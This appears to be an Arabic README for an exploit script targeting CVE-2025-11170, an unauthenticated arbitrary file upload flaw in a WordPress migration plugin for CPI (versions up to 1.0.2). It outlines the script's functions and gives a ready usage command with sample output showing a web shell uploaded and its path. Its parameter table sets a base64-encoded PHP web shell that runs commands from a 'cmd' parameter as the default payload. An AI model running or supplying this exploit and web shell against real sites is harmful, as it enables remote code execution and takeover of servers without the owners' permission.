
مكوّن إضافي مخصص لترحيل ووردبريس لـ CPI <= 1.0.2 - رفع ملف تعسفي بدون مصادقة
WP移行専用プラグイン for CPI <= 1.0.2 - رفع ملف تعسفي بدون مصادقة
يُعاني إضافة WP移行専用プラグイン for CPI الخاصة بووردبريس من ثغرة تسمح برفع الملفات التعسفية بسبب عدم التحقق من نوع الملف في الدالة Cpiwm_Import_Controller::import في جميع الإصدارات حتى 1.0.2.
يسمح هذا للمهاجمين غير المصادقين بـ رفع ملفات تعسفية إلى خادم الموقع المتأثر، مما قد يمكنهم من تنفيذ تعليمات برمجية عن بُعد.
CVE-2025-11170.pyNxploited_parse_args
تحليل والتحقق من صحة وسائط الإدخال. يضمن بنية نقطة النهاية الصحيحة والترويسات وتشفير البيانات.
Nxploited_logging
إعداد تسجيل متقدم ومستوى تفاصيل لإخراج مفصل أو مختصر أثناء التشغيل.
Nxploited_retry_session
تهيئة جلسة دائمة مع منطق إعادة محاولة وتأخير للاتصالات المتينة.
Nxploited_build_payload
بناء معاملات طلب POST للاستغلال.
Nxploited_send
تنفيذ طلب POST الفعلي إلى نقطة النهاية الضعيفة وإدارة الردود/الأخطاء.
Nxploited_output_result
معالجة وتنسيق الرد، عرض مسار الشيل عند النجاح، أو معلومات التصحيح خلاف ذلك.
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
مثال للإخراج:
Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
My GitHub: https://github.com/Nxploited
هذا السكربت مقدم لأغراض تعليمية فقط.
استخدام هذه الأداة على أهداف دون إذن مناسب قد يكون غير قانوني.
المؤلف لا يتحمل أي مسؤولية عن أي استخدام خاطئ أو أضرار أو عواقب قانونية.
GitHub: Nxploited
Telegram: KNxploited
بواسطة: Nxploited ( Khaled Alenazi )
| الوسيط | الوصف |
|---|
-u, --url | عنوان الهدف الأساسي (مثل http://target.com/wordpress/). يضيف السكربت wp-admin/admin-ajax.php تلقائياً. |
-f, --filename | اسم الشيل أو الملف المطلوب رفعه. القيمة الافتراضية: shell.php |
-d, --data | محتوى الملف بصيغة base64 (أو نص عادي). القيمة الافتراضية: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ |
-i, --index | قيمة حقل الفهرس. القيمة الافتراضية: 0 |
-H, --headers | ترويسات HTTP إضافية (بصيغة: X-Key:Value;K2:Value2) |
-t, --timeout | مهلة طلب HTTP (بالثواني). القيمة الافتراضية: 10 |
--retries | عدد محاولات إعادة المحاولة. القيمة الافتراضية: 3 |
--backoff | عامل التأخير بين المحاولات (بالثواني). القيمة الافتراضية: 0.7 |
-v, --verbose | زيادة مستوى التفاصيل للتصحيح (قابل للتكرار) |